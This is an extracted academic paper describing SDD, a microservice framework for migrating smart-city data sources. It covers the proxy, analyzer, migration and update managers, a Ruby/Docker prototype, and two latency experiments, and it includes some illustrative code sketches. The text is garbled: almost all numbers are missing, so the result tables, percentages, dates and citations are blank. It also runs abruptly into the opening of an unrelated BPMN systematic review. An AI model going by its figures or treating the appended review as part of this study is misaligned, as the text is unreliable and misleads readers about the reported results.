the framework, with an overview of its main components shown in fig. , follows the microservice (newman, ) architecture paradigm. it consists of eight main components, each of which is realized as a microservice. the components utilize both service-based and message-oriented communication to exchange information. specifically, we distinguish three different queue types: an analyzer queue, a handler queue, and an update queue, which will be explained in more detail in the context of the corresponding components. additionally, the framework utilizes the principle of confidence elasticity, a concept we introduced and successfully applied in our previous work (schleicher et al., b; schleicher et al., a). in this framework, the concept is used in the update manager and migration manager components to select a suitable migration or update strategy for a specific data source. each strategy is associated with a confidence value (c ∈ ℝ, 0 ≤ c ≤ 1), with 0 representing no certainty and 1 representing absolute certainty about the produced result. this convention allows the framework to configure certain confidence intervals to augment the process of choosing an applicable strategy within these two components. these confidence intervals are provided as configuration elements for the framework. if the confidence thresholds are not met, the framework follows an escalation model to find the next strategy that is able to provide results with higher confidence, until it reaches the point where human interaction is necessary to produce a satisfactory result. in the context of the migration and update manager components, this means that if a migration or update of a data source cannot be performed with satisfactory confidence, the escalation model will prompt for human interaction to perform said migration or update.

sdd proxy

the sdd proxy acts as a transparent proxy between clients and data sources (dais). the proxy itself has two main responsibilities. first, it submits all incoming requests to an analyzer message queue before forwarding them to the requested data source. second, it listens to the handler message queue for potential redirections to be taken for a specific request. if the handler message queue contains a message for the current request, it is processed by the sdd proxy, the request in question is redirected to the new data source, and the message is removed from the handler queue. to avoid bottlenecks, there can be multiple proxies, each of which is managed by the sdd manager via the sdd proxy api.
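a minimal sketch of the proxy behavior described above could look as follows (typescript; the queue and forwarding primitives are left abstract and are assumptions of this sketch, not apis of the actual implementation):

// a sketch of the sdd proxy: publish each request to the analyzer queue,
// apply any pending redirection from the handler queue, then forward it.
interface Queue<T> {
  publish(msg: T): void;
  poll(predicate: (msg: T) => boolean): T | undefined; // remove and return first match
}

interface Redirection { requestKey: string; newTarget: string; }
interface DataRequest { key: string; target: string; payload?: unknown; }

class SddProxy {
  constructor(
    private analyzerQueue: Queue<DataRequest>,
    private handlerQueue: Queue<Redirection>,
    private forward: (target: string, req: DataRequest) => Promise<unknown>,
  ) {}

  async handle(req: DataRequest): Promise<unknown> {
    // responsibility 1: make the request visible to the analyzer manager
    this.analyzerQueue.publish(req);

    // responsibility 2: honor redirections produced by the migration manager
    const redirect = this.handlerQueue.poll((m) => m.requestKey === req.key);
    const target = redirect ? redirect.newTarget : req.target;

    return this.forward(target, req);
  }
}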
sdd manager

the sdd manager acts as the central management component of the framework and provides the sdd api for overall framework control. to activate the framework, a user invokes the sdd api with the following parameters: (i) a set of triggers and (ii) a confidence interval to configure the confidence elasticity of the framework. the sdd manager then starts the first sdd proxy and begins monitoring the average request rate as well as the utilization of the proxy via the sdd proxy api. if the sdd manager detects a potential bottleneck, it starts another proxy (or additional ones if necessary, based on the average request rate). the next task of the sdd manager is to submit the provided triggers to the analyzer manager, which uses them to invoke the corresponding request monitoring. a trigger is used in the analyzer to decide whether a request needs to be handled or not. triggers can, for example, be time based, size based, or follow a customizable cost function, and they provide a threshold for triggering a handling action. the analyzer manager uses different pluggable analyzer strategies in correspondence with these submitted triggers to determine if a request needs to be processed. if this is the case, the analyzer manager invokes the migration manager via the migration api and provides the corresponding request including the results of its analysis.

figure : sdd manager sequence diagram.

the migration manager is responsible for determining the potential migration strategies for the data resource in question. to achieve this, it first contacts the dependency manager, which uses a dependency resolution mechanism to determine the corresponding dau for the dai being requested by the current request. the dependency manager in turn is tightly integrated with the security manager, which ensures that all security constraints defined in the daus are satisfied before returning the results of the resolution. once the dependency resolution has provided the dau, it is analyzed by the migration manager. specifically, it checks the results provided by the analyzer manager, such as request time, data size, or a respective cost function, against the attributes of the specific view being requested. it analyzes the update frequency as well as update sizes to determine whether a migration should be performed, to determine the fitting migration strategy, and to execute it if applicable.
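the following typescript sketch (our own illustration of one possible migration strategy; the cost terms and weights are assumptions, not taken from the paper) contrasts the observed request behavior reported by an analyzer with the update effort implied by a view's update frequency and size, and returns a decision together with a confidence value:

// a sketch of a migration strategy decision: migrate when the expected gain in
// request latency outweighs the expected update effort; all weights are assumptions.
interface AnalyzerResult { avgLatencyMs: number; requestsPerDay: number; }
interface ViewStats { size: number; updatesPerDay: number; updateFraction: number; }

interface MigrationDecision { migrate: boolean; confidence: number; }

function decideMigration(observed: AnalyzerResult, view: ViewStats,
                         transferCostPerUnit: number): MigrationDecision {
  // expected daily benefit: latency saved across all requests (simplified)
  const benefit = observed.avgLatencyMs * observed.requestsPerDay;
  // expected daily cost: data that has to be re-transferred to keep the copy fresh
  const cost = view.size * view.updateFraction * view.updatesPerDay * transferCostPerUnit;

  const migrate = benefit > cost;
  // crude confidence: how clearly one side dominates, mapped into [0, 1]
  const confidence = Math.min(1, Math.abs(benefit - cost) / Math.max(benefit, cost, 1));
  return { migrate, confidence };
}

// usage example with hypothetical numbers
console.log(decideMigration(
  { avgLatencyMs: 180, requestsPerDay: 5000 },
  { size: 2000, updatesPerDay: 1, updateFraction: 0.05 },
  0.5,
));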
once these steps are successfully finished, the migration manager updates the dais and daus via the repository manager to reflect the changes caused by the migration. a corresponding sequence diagram illustrating this process is shown in fig. .

analyzer manager
the role of the analyzer manager is to determine whether a request is a potential candidate for a migration. it watches the analyzer queue for requests that correspond to any of the previously provided triggers. a trigger is a threshold that matches an attribute produced by an analyzer strategy. analyzer strategies in turn are pluggable mechanisms that analyze a specific request based on the type of the request in question. basically, we distinguish three different types of strategies: time analyzers, which determine the response time for a specific request; size analyzers, which determine the size of a request and response; and frequency analyzers, which determine the frequency of requests to a certain source. additionally, cost function analyzers can be provided, which allow arbitrary cost functions to be integrated and enable much greater analytical flexibility. once a threshold is met, the analyzer manager submits the request in question, including the results of the specific strategy, to the migration manager.

migration manager
the migration manager is responsible for deciding whether a data resource should be migrated, based on the results of the analyzer manager. it is invoked via the migration api with a specific request augmented with the results from the corresponding analyzer strategy. the migration manager then forwards this request to the dependency manager, which first determines the dai that belongs to the requested data resource. based on this dai, the dau is determined only if all security constraints are met, which in turn is ensured by the security manager. the retrieved dau provides the foundation for deciding whether a data source can and should be migrated. to achieve this, the migration manager relies on pluggable strategies that determine whether a migration is feasible and possible. such a migration strategy receives the retrieved dau as well as the results from the analyzer manager. based on this, it does two things: first, it determines whether a migration is possible by checking the results of the analyzer manager (e.g., response time, average transfer size) against the updatefrequency elements of the dau as well as the constraints of the current infrastructure. if this analysis leads to the conclusion that a migration is possible and feasible, the migration strategy returns its results augmented with a confidence value. second, the migration strategy provides a method to execute the actual migration. the framework is flexible regarding the specific migration mechanism and regards it as the responsibility of the strategy itself. one possible variant is the utilization of the smart fabric framework (schleicher et al., a), since it provides an optimal foundation for infrastructure-agnostic deployments (and hence migrations) and supports the extended system model. in the case of a smart fabric strategy, the infrastructure specifications (is) are taken into account when deciding whether a migration is feasible. this means the migration strategy can check which non-functional characteristics apply and can incorporate them in the decision to migrate.
additionally, the execution of said migration is started by issuing a transfer request to the smart fabric framework. based on the previously introduced confidence elasticity mechanism, the migration manager then executes the corresponding migration strategy or, in case none is found, relies on human interaction to perform the migration. once the migration is finished, the migration manager creates new corresponding dais to reflect the migrations and updates the corresponding daus. furthermore, it publishes a message to the handler queue and by doing so prompts the sdd proxy to execute a redirection to the migrated data source. once this is done, the migration manager ensures that the migrated data source is kept up to date by registering the dais at the update manager.

update manager
the role of the update manager is to ensure that migrated data sources stay up to date if the original source is changed. to enable this, it relies on pluggable update strategies, and we basically distinguish the following types: simple copy strategies, which copy either a fraction or the entire data source; script update strategies, which apply a more complex update based on a script (e.g., rsync, sql scripts); and streaming replication strategies for continuous updates. these strategies again utilize the confidence elasticity mechanism by providing a confidence value. based on the initially provided confidence interval of the framework, the escalation mechanism selects an applicable update strategy or, in case none is found, relies on human interaction to perform the update. once the update is finished, the update manager updates the corresponding dai via the repository manager.

dependency manager
the dependency manager is responsible for resolving unit dependencies between the modeled data entities, as described in the system model above. to achieve this, the dependencies between data entities in the system model are represented as a tree structure. based on this tree structure, the dependency manager creates a root node for each dau. it then creates a corresponding leaf node for each dai that is referenced in the dependency section of the dau. after this, it checks the related dis and adds them as leaves. for every step, the dependency manager also ensures that all security constraints are met by checking the specific dau with the security manager. if access is not permitted, the resolution is not successful.

security manager
the security manager is responsible for ensuring that all security constraints that apply to a given dau are met. to do so, it checks two facets of a dau. first, it ensures that a dau description can be accessed by checking the securityconstraints element in the metainformation section. second, it ensures that each view can be accessed as well as migrated by checking the corresponding securityconstraints element in the view sections of the dau. to enable an open and evolvable security system, the security manager relies on pluggable security strategies. examples of such strategies are ldap, oauth, or other approaches like rbac (hummer et al., ), but the system can be extended to any other suitable security mechanism.

repository manager
the repository manager provides repositories for daus and dais and acts as a distributed registry keeping track of specific deployments and participating entities. it is responsible for storing and retrieving the system model.
it manages two distinct system model repositories utilizing distributed key-value stores, which store the json-ld files that represent daus and dais in a structured way. the repository manager provides a service interface to access these files, as well as a search interface to query daus and dais based on specific elements. additionally, it is responsible for managing dependencies between daus as well as dais, and it seamlessly integrates with the repository managers of other sdd framework deployments, ensuring a complete dau and dai lookup.

implementation
for evaluation purposes, we created a proof-of-concept prototype of our framework based on a set of restful microservices implemented in ruby and packaged as docker (https://www.docker.com/) containers. every component that exposes a service interface relies on the sinatra (http://www.sinatrarb.com/) web framework. to enable the message-based communication for the analyzer, handler and update queues, we used rabbitmq (https://www.rabbitmq.com/) as message-oriented middleware. the repository manager utilizes mongodb (https://www.mongodb.org/) as its storage backend, which enables a distributed, open, and extendable key value store for the dau and dai repositories and provides the foundation for the distributed registry. the sdd proxy was implemented as a webrick (https://ruby-doc.org/stdlib- . . /libdoc/webrick/rdoc/webrick.html) proxy server. additionally, we patched the default ruby http class in our prototype implementation to enable the transparent proxy behavior. we implemented the analyzer manager with two analyzer strategies. specifically, we implemented a web request response time analyzer as well as a web request response size analyzer, which allowed us to analyze response times as well as average sizes of requests and responses. the migration manager was implemented with two migration strategies: the first was a mongodb strategy that supports the migration of mongodb databases and collections, the second a docker strategy that enables a docker-based container migration. for the update manager, we reused the mongodb strategy as a mongodb database copy strategy and a mongodb collection copy strategy, and additionally implemented a file-based scp full copy strategy, which transfers files via secure copy (scp). the prototype implementation is available online and can be found at https://bitbucket.org/jomis/smartdata.

evaluation setup
as the basis for our evaluation, we used the urbem smart city application (usca) (schleicher et al., c), a holistic interdisciplinary decision support system, which has been used for city infrastructure planning tasks, especially in the context of energy and mobility systems. we chose the usca because it represents an optimal candidate for our evaluation due to the following characteristics: (i) it heavily relies on a diverse set of data sources, most of which belong to stakeholders and are under strict security and compliance regulations; (ii) it is an application that has to deal with changing requirements that make it necessary to incorporate new data sources dynamically; (iii) due to the nature of the application as a planning tool for energy and mobility systems, it is a common case to incorporate data sources from other cities around the globe.
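to give an impression of the proxy layer of the prototype described above, the following ruby sketch builds a transparent forwarding proxy on webrick's httpproxyserver; the port and the content handler are illustrative, and the actual prototype additionally patches ruby's http client and publishes request metadata to the analyzer queue.

require 'webrick/httpproxy'

# minimal transparent proxy: every proxied response passes through the
# handler, where request metadata could be published to the analyzer queue
handler = proc do |req, res|
  # e.g., enqueue { uri: req.request_uri.to_s, size: res.body&.bytesize }
end

proxy = WEBrick::HTTPProxyServer.new(Port: 8080, ProxyContentHandler: handler)
trap('INT') { proxy.shutdown }
proxy.start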
due to the strict data security regulations, we were not allowed to use the original data from the urbem domain for our evaluation scenario. to overcome this limitation, we created anonymized random samples of the most common data sources used in the usca. the specific datasets we used included building data with different granularity levels, thermal and electrical network data, as well as mobility data. based on these data sources, we created data units (daus) for each of them as well as exemplary data services as technical units (tus). as a next step, we looked at the common request patterns for these types of data based on the request history of the usca. since the usca relies on user input via its graphical user interface, we created sample clients, which exercised these request patterns in order to enable automated testing. based on these foundations, we created two different evaluation scenarios. for the first scenario, we provisioned two vm instances in our private openstack cloud, each with . gb of ram and virtual cpus. these two instances represented data centers in the cities of vienna and melbourne. in order to simulate realistic transfer times between these two regions, we used the linux traffic control tool (tc) to simulate the average delay between these regions, including common instabilities. each of these instances was running ubuntu . lts with docker. for the second scenario, we provisioned three vm instances in the google cloud platform. we used n -standard- instance types, each with . gb of ram and virtual cpus. in order to get a realistic geographic distribution, we started each of these instances in a different cloud region. specifically, we started one in the us-central region representing the city of berkeley, one in the europe-west region representing the city of vienna, and one in the asia-east region representing the city of hong kong. each of these instances was again running ubuntu . lts with docker. for monitoring purposes, we used datadog (https://www.datadoghq.com/) as the monitoring platform. we submitted custom metrics for request and response times, and monitored system metrics for bytes sent as well as overall instance utilization to ensure that over-utilization had no impact on our results.

experiments
in this section, we give a detailed overview of the conducted experiments within the two scenarios.

scenario one
in the first scenario, we wanted to evaluate the impact of sdd in the context of a simple scenario using the usca for analytics of two cities. we simulated a case in which stakeholders use the usca to compare the impact of city planning scenarios on the building stock, thermal network and public transport between the cities of vienna and melbourne. to achieve this, we generated data services based on the daus we defined for buildings, networks and mobility, as well as the corresponding dais, and deployed them as docker containers on the instance representing melbourne. we did the same for the instance in vienna. in the next step, we deployed clients simulating the previously mentioned request patterns on the vienna instance.
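the custom request and response time metrics mentioned in the setup above could, for example, be captured with a small wrapper such as the following ruby sketch; the metric name and the collector endpoint are illustrative assumptions rather than the prototype's actual datadog integration.

require 'json'
require 'net/http'
require 'benchmark'

COLLECTOR = URI("http://localhost:8125/metrics")  # illustrative endpoint

# times a proxied request and reports the elapsed seconds as a custom metric
def timed_request(uri)
  response = nil
  elapsed = Benchmark.realtime { response = Net::HTTP.get_response(URI(uri)) }
  metric = { name: "sdd.request.response_time", value: elapsed, tags: [uri] }
  Net::HTTP.post(COLLECTOR, metric.to_json, "Content-Type" => "application/json")
  response
end

timed_request("http://localhost:8080/buildings")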
this setup of clients and sources represented a common sample size of clients and services used in the current usca context. as a last step, we deployed the sdd framework, specifically three containers: one for the sdd proxy, one for the repository manager and one for the other components of the sdd framework. an overview of this evaluation scenario can be seen in fig. .

figure evaluation setup for scenario one.

in the context of this scenario, we distinguished different request types to three different kinds of daus. the first dau, buildings, represented a larger data source ( . entities) with a low update frequency (once a year). for this resource, we had two request types on two views of this resource, specifically /buildings and /blocks, representing two different levels of detail. the second dau was networks, again representing a larger data source ( . entities) with a low update frequency (once quarterly). for this resource, we had one request type on the only view of this resource, namely /networks. the last dau was mobility, representing a smaller data source ( . entities) with a high update frequency in the public transport context. to establish a baseline, we started our evaluation with the sdd framework deactivated and monitored the response times of each of these four request types, as well as the transferred bytes from the melbourne instance, through custom datadog monitors. after min, we started the sdd framework by submitting a request to the sdd manager on the vienna instance via the sdd api, with triggers for response times longer than s and a confidence value that matched our automated migration strategies, since we wanted to test the automated capabilities of the sdd framework. after submitting the request, we continued to monitor the results of the datadog monitors over the course of an additional min. the results of our evaluation can be seen in fig. .

figure evaluation results for scenario one.

in the figure, we see the different characteristics of the response times for the request types: buildings, blocks and networks show longer response times, while mobility shows a rather short response time. given the submitted triggers as well as the implemented migration strategy, in the context of the size and update characteristics of the daus, buildings, blocks and networks qualified for migration. we see that the framework correctly identified these requests and started migrating the corresponding dais around minute . the total migration time for all three resources was . seconds; during this time, the sdd proxy kept forwarding the requests to the original dais. after the migration had finished and the sdd proxy successfully started redirecting to the new dais, we see a significant reduction in the average response times for all three request types. the mobility source was not migrated, since it did not qualify: its response times were below the trigger.
we also see that the response time for this resource shows an increase, which is due to the specific proxy implementation and is caused by the overhead of redirection checks once the framework has been activated; this overhead is present for all request types. the efficiency of the specific proxy implementation was not the focus of this work and does not influence the validity of the presented results, since the introduced overhead affects all requests equally. additionally, we see that in this scenario the network transfer from the instance representing melbourne was reduced by % after the migrations finished. this is due to the fact that only the dai for mobility remains active on this instance and no other clients or framework components are actively sending data from melbourne. the aggregated overview in table shows that the average and median response times, along with the variance in response times, for all migrated dais were reduced significantly.

table average, median and standard deviation for response times per request type in scenario one.
request type | status | average response time | median response time | standard deviation of response time
buildings | inactive | . s | . s | . s
buildings | active | . s | . s | . s
blocks | inactive | . s | . s | . s
blocks | active | . s | . s | . s
networks | inactive | . s | . s | . s
networks | active | . s | . s | . s
mobility | inactive | . s | . s | . s
mobility | active | . s | . s | . s

scenario two
in the second scenario, we wanted to evaluate the impact of sdd in the context of a larger and more complex scenario, using the usca for analytics in an internet of cities setup with cities in different regions. we again simulated a case in which stakeholders use the usca to compare the impact of city planning scenarios on the building stock, thermal network and public transport, this time between the cities of berkeley, vienna and hong kong, which were placed in the respective regions of the google cloud platform as described in the setup section. to achieve this, we again generated data services based on the daus we defined for buildings, networks and mobility, as well as the corresponding dais, and deployed them as docker containers on all three instances. in the next step, we deployed clients per city simulating the previously mentioned request patterns. we then deployed the sdd framework, specifically three containers: one for the sdd proxy, one for the repository manager and one for the other components of the sdd framework, on every instance. an overview of this evaluation scenario is depicted in fig. .

figure evaluation setup for scenario two.

in this scenario, we distinguished the same request types as before. to establish a baseline, we started our evaluation with the sdd framework deactivated and monitored the response times of each of these four request types, as well as the transferred bytes from all participating instances, through custom datadog monitors.
after min, we started the sdd framework by submitting a request to the sdd manager on each of the three instances via the sdd api, with triggers for response times longer than s and a confidence value that matched our automated migration strategies, since our focus was again on testing the automated capabilities of the sdd framework. after submitting the requests, we continued to monitor the results of the datadog monitors over the course of an additional min. the results of our evaluation can be seen in fig. .

figure evaluation results for scenario two.

by investigating the figure, we notice that the framework again correctly identified the three request types to buildings, blocks and networks as candidates for migration. the framework starts migrating the corresponding dais around minute . in this more complex case, the total migration time for all three resources over all three instances was . seconds. after the migration had finished and the sdd proxy successfully started redirecting to the new dais, we again see a significant reduction in the average response times for all three request types. in terms of network transfer, we do not see a significant reduction, as opposed to scenario one, since in this setup there are active clients as well as framework components deployed on all instances that continue to issue requests and hence send data. the aggregated overview in table shows that the average and median response times for all migrated dais were again reduced significantly.

table average, median and standard deviation for response times per request type in scenario two.
request type | status | average response time | median response time | standard deviation of response time
buildings | inactive | . s | . s | . s
buildings | active | . s | . s | . s
blocks | inactive | . s | . s | . s
blocks | active | . s | . s | . s
networks | inactive | . s | . s | . s
networks | active | . s | . s | . s
mobility | inactive | . s | . s | . s
mobility | active | . s | . s | . s

in contrast to the lab environment of scenario one, a significant reduction in response time variance was not observed, which can be attributed to the performance variability of cloud instances as well as the distribution over the chosen regions. our experiments showed that we could significantly reduce the response times and hence improve the qos for the urbem smart city application. specifically, we showed a reduction of the response times by % on average over all three migrated request types. we also demonstrated that the framework was able to correctly identify the dais to be migrated by utilizing the views specified in the corresponding daus. finally, we showed that we could produce these results both in a laboratory setting as well as in a geographically dispersed cloud setup.

threats to applicability
while the presented system model and framework fulfill the requirements set forth in the context of the previously introduced urbem smart city application, certain threats to the general applicability of sdd remain. the initial evaluation setup for scenario one used tc to introduce the delays between the two instances representing vienna and melbourne. it could be argued that this simulated setup was not representative of the evaluation; however, the fact that the experiments showed similar results in a globally distributed deployment refutes this claim. beyond this, the current evaluation relied on simulated clients and data sources for the experiments.
to ensure that the used workloads and data sources are realistic and representative, we gathered workload patterns and anonymized example records from the urbem smart city application used by domain experts.

related work
the recent trend in smart city research towards the introduction of smart city platforms and reference models has been further fanned by the rise of the internet of things (iot). while all of these approaches mention the importance of data management in the context of the massive amount of data, its heterogeneity and the multitude of security and compliance constraints, data management currently either is not a framework element or no specific solutions are provided for this problem. chourabi et al. ( ) present a framework to understand the concept of a smart city on a more abstract level. the authors introduce a conceptual framework to comprehend the vital elements in a smart city by identifying critical factors. in the context of ict, they identify security, privacy as well as accessibility as central elements for smart city applications. in a similar way, naphade et al. ( ) present innovation challenges for smarter cities. the authors identify the management of information across all of a city's information systems, including the need for privacy and security, as a central challenge for the success of smart cities, underlining the importance of a data management approach like ours. on a more concrete level, bonino, pastrone & spirito ( ) present almanac, a smart city platform with a focus on the integration of heterogeneous services. they identify challenges smart city applications face, also in terms of infrastructure, and specifically mention the importance of taking data ownership and exchange between the different smart city stakeholders into account. compared to our approach, however, they do not provide a specific solution to address these challenges, especially none applicable to legacy data. in the context of iot, where more and more data sources emerge, data management plays a central role. jin et al. ( ) introduce a smart city iot infrastructure blueprint. the authors focus on the urban information system, starting from the sensory level up to issues of data management and cloud-based integration. they identify key iot building blocks for a smart city infrastructure, one of them being the so-called data-centric iot, in which data management is a central factor. in a similar high-level manner, petrolo, loscrì & mitton ( ) introduce the vital platform as an iot integration platform to overcome the fragmentation issue in smart cities. they mention data challenges that arise from introducing iot and specifically underline the importance of privacy and security in this context. the need for data management in order to integrate the produced results also applies to a lot of other iot platforms, in order to make their results accessible for further analytics. examples of such frameworks are chen & chen ( ), who present a data acquisition and integration platform for iot; a central element in their architecture is a contextual data platform that needs to integrate with multiple heterogeneous data sources. cheng et al. ( ) present cidap, a city and data analytics platform based on smartsantander (sanchez et al., ), a large-scale testbed that helps with issues arising from connecting and managing iot infrastructure.
they name data management, especially the exchange of data as well as the attached semantics, as one central challenge. finally, in the context of specific iot smart city applications, kyriazis et al. ( ) present two sustainable smart city applications in the transportation and energy domains. they clearly identify security in the context of data as a specific challenge in enabling these applications, emphasizing the importance of approaches like ours. in the context of iot platforms and iot smart city applications, our approach provides the missing link for security-aware data management within frameworks, tackling many of the identified challenges, as well as providing an ideal way to expose the collected data in a usage-aware distributed way. a vital element to enable this kind of data management in an efficient way is the ability to migrate data resources. in the context of said migration, there are several approaches relevant to our work. amoretti et al. ( ) propose an approach that facilitates a code mobility mechanism in the cloud. based on this mechanism, services can be replicated to provide a highly dynamic platform and increase the overall service availability. in a similar way, hao, yen & thuraisingham ( ) discuss a cost model and a genetic decision algorithm that addresses the tradeoff between service selection and migration in terms of costs, to find an optimal service migration solution. they introduce a framework for service migration based on this adaptive cost model. opposed to our approach, they focus on the service migration aspect without explicitly addressing the data aspect, and they do not provide means for incorporating security and other characteristics on a more fine-grained data level. in the context of potential migration strategies, there are several interesting approaches. agarwal et al. ( ) present volley, an automated placement approach for distributed cloud services. their approach uses logs to derive access patterns and client locations as input for optimization and hence migration. ksentini, taleb & chen ( ) introduce a service migration approach for follow me clouds based on a markov decision process (mdp). in a similar way, wang et al. ( ) demonstrate an mdp as a framework to design optimal service migration policies. all of these approaches can be integrated as potential migration strategies in our approach.

conclusion
current smart city application models assume that produced data is managed by and bound to its original application. such data silos have emerged, in part, due to the complex security and compliance constraints governing the potentially sensitive information produced by current smart city applications. while it is essential to enforce security and privacy constraints, we have observed that smart city data sources can often provide aggregated or anonymized data that can be released for use by other stakeholders or third parties. this is especially promising, as such data sources are not only relevant for other stakeholders in the same city, but also for other smart cities around the globe. we argue that future smart city applications will use integrated data from multiple sources, gathered from different cities, to significantly improve the efficiency and effectiveness of city operations, as well as citizen wellbeing.
to allow for the creation of such applications, a seamless and efficient mechanism for the description of and access to available smart city data is required. in this paper, we presented smart distributed datasets (sdd), a methodology and framework to enable transparent and efficient distributed data access for data sources in smart city environments. a system model that provides a simple abstraction for the technology-agnostic description of available data sources and their subsets was introduced. subsets can represent different aspects and granularities of the original data source, along with relevant characteristics common in the smart city domain. based on this abstraction, we presented the sdd framework, a middleware toolset that enables efficient and seamless data access for smart city applications by autonomously relocating relevant subsets of available data sources to improve quality of service (qos), based on a configurable mechanism that considers request latency as well as costs for data transfer, storage, and updates. we evaluate the presented framework using a case study in the context of a distributed city infrastructure decision support system and show that selective relocation of data subsets using the sdd framework can improve qos by significantly reducing response times, by % on average. in our ongoing work, we will integrate additional optimization mechanisms into the data migration process to further improve framework performance. we also plan to more closely integrate the sdd framework with our overall efforts in designing, engineering, and operating smart city applications (schleicher et al., b). furthermore, we will create additional smart city applications covering different application areas, in collaboration with domain experts from urbem as well as other smart city initiatives. in the context of our research on the future internet of cities, we will extend the sdd framework to support autonomous, ad-hoc coordination of globally distributed sdd proxies to further optimize dai placement in smart city application ecosystems.

additional information and declarations
funding
the research leading to these results has received funding from the urbem doctoral college. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: urbem doctoral college.

competing interests
schahram dustdar is an academic editor for peerj.

author contributions
• johannes m. schleicher conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.
• michael vögler and christian inzinger conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, and reviewed drafts of the paper.
• schahram dustdar reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: the source code repository for the prototype implementation is available at https://bitbucket.org/jomis/smartdata.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
agarwal s, dunagan j, jain n, saroiu s, wolman a, bhogan h. .
volley: automated data placement for geo-distributed cloud services. in: proceedings of the th usenix conference on networked systems design and implementation, – .
amoretti m, laghi mc, tassoni f, zanichelli f. . service migration within the cloud: code mobility in sp a. in: proceedings of the international conference on high performance computing & simulation. piscataway: ieee, – doi . /hpcs. . .
bonino d, pastrone c, spirito m. . towards a federation of smart city services. in: proceedings of the international conference on recent advances in computer systems, – .
chen ys, chen yr. . context-oriented data acquisition and integration platform for internet of things. in: proceedings of the conference on technologies and applications of artificial intelligence. piscataway: ieee, – .
cheng b, longo s, cirillo f, bauer m, kovacs e. . building a big data platform for smart cities: experience and lessons from santander. in: proceedings of the international congress on big data. piscataway: ieee, – .
chourabi h, nam t, walker s, gil-garcia jr, mellouli s, nahon k, pardo ta, scholl hj. . understanding smart cities: an integrative framework. in: proceedings of the th hawaii international conference on system sciences. piscataway: ieee, – .
hao w, yen i-l, thuraisingham b. . dynamic service and data migration in the clouds. in: proceedings of the rd ieee international computer software and applications conference. piscataway: ieee, – .
hummer w, gaubatz p, strembeck m, zdun u, dustdar s. . enforcement of entailment constraints in distributed service-based business processes. information and software technology ( ): – doi . /j.infsof. . . .
inzinger c, nastic s, sehic s, vögler m, li f, dustdar s. . madcat—a methodology for architecture and deployment of cloud application topologies. in: proceedings of the international symposium on service-oriented system engineering. piscataway: ieee, – .
jin j, gubbi j, marusic s, palaniswami m. . an information framework for creating a smart city through internet of things. ieee internet of things journal ( ): – doi . /jiot. . .
ksentini a, taleb t, chen m. . a markov decision process-based service migration procedure for follow me cloud. in: proceedings of the international conference on communications. piscataway: ieee, – .
kyriazis d, varvarigou t, white d, rossi a, cooper j. . sustainable smart city iot applications: heat and electricity management & eco-conscious cruise control for public transportation. in: proceedings of the th international symposium on "a world of wireless, mobile and multimedia networks". piscataway: ieee, – doi . /wowmom. . .
naphade m, banavar g, harrison c, paraszczak j, morris r. . smarter cities and their innovation challenges. computer ( ): – doi . /mc. . .
newman s. . building microservices. sebastopol: o'reilly media, inc.
petrolo r, loscrì v, mitton n. . towards a smart city based on cloud of things, a survey on the smart city vision and paradigms.
transactions on emerging telecommunications technologies :e doi . /ett. .
sanchez l, muñoz l, galache ja, sotres p, santana jr, gutierrez v, ramdhany r, gluhak a, krco s, theodoridis e, pfisterer d. . smartsantander: iot experimentation over a smart city testbed. computer networks (november): – doi . /j.bjp. . . .
schleicher jm, vögler m, dustdar s, inzinger c. a. enabling a smart city application ecosystem: requirements and architectural aspects. ieee internet computing ( ): – .
schleicher jm, vögler m, inzinger c, dustdar s. a. smart fabric—an infrastructure-agnostic artifact topology deployment framework. in: proceedings of the international conference on mobile services. piscataway: ieee, – .
schleicher jm, vögler m, inzinger c, dustdar s. b. towards the internet of cities: a research roadmap for next-generation smart cities. in: proceedings of the international workshop on understanding the city with urban informatics. new york: acm, – .
schleicher jm, vögler m, inzinger c, dustdar s. b. smart brix—a continuous evolution framework for container application deployments. peerj computer science :e doi . /peerj-cs. .
schleicher jm, vögler m, inzinger c, fritz s, ziegler m, kaufmann t, bothe d, forster j, dustdar s. c. a holistic, interdisciplinary decision support system for sustainable smart city design. in: proceedings of the international conference on smart cities. cham: springer, – .
vögler m, schleicher jm, inzinger c, dustdar s, ranjan r. . migrating smart city applications to the cloud. ieee cloud computing ( ): – .
wang s, urgaonkar r, zafer m, he t, chan k, leung kk. . dynamic service migration in mobile edge-clouds. in: proceedings of the th ifip networking conference, – .

approaches combining methods of operational research with business process model and notation: a systematic review
hana tomaskova and gerhard-wilhelm weber ,
university of hradec kralove, faculty of informatics and management, hradec kralove, czech republic
faculty of engineering management, poznan university of technology, poznan, poland
institute of applied mathematics, middle east technical university, ankara, turkey

abstract
background: business process modelling is increasingly used not only by companies' management but also by scientists dealing with process models. process modelling is seldom done without decision-making nodes, which is why operational research methods are increasingly included in process analyses.
objective: this systematic literature review aimed to provide a detailed and comprehensive description of the relevant aspects of operational research techniques used in business process model and notation (bpmn) models.
methods: the web of science database of clarivate analytics was searched for studies that used operational research techniques together with business process model and notation, published in english between january and may . the inclusion criteria were as follows: use of operational research methods in conjunction with bpmn, and availability in full-text format. articles were not excluded based on methodological quality. the background information of the included studies, as well as specific information on the used approaches, were extracted.
results: in this research, thirty-six studies were included and considered. a total of specific methods falling into the field of operations research were identified, and their use in connection with the process model was described.
conclusion: operational research methods are a useful complement to bpmn process analysis. they serve not only to analyze the probability of the process and its economic and personnel demands, but also for process reengineering.

subjects data science, optimization theory and computation, social computing
keywords bpmn, business process model and notation, operation research, or, decision making, techniques, review

how to cite this article tomaskova h, weber g-w. . approaches combining methods of operational research with business process model and notation: a systematic review. peerj comput. sci. :e doi . /peerj-cs. submitted february , accepted september , published november . corresponding author hana tomaskova, hana.tomaskova@uhk.cz. academic editor daniel de oliveira. copyright tomaskova and weber, distributed under creative commons cc-by .

introduction
it has been more than years since 'business process model and notation' or 'business process modelling notation' (bpmn) became the official notation for process modelling. during its lifetime, this notation has gained many users and, thanks to its user-friendliness, it is used in many areas. this wide usage has led to its interconnection with other technologies and methods. the fundamental problem of any complex process is decision making. operational research, as a popular scientific approach, is so often associated with procedural issues that its connection to bpmn is more than natural. this article focuses on the analysis of the relationship between business process model and notation (bpmn) process modelling and specific methods of operational research.

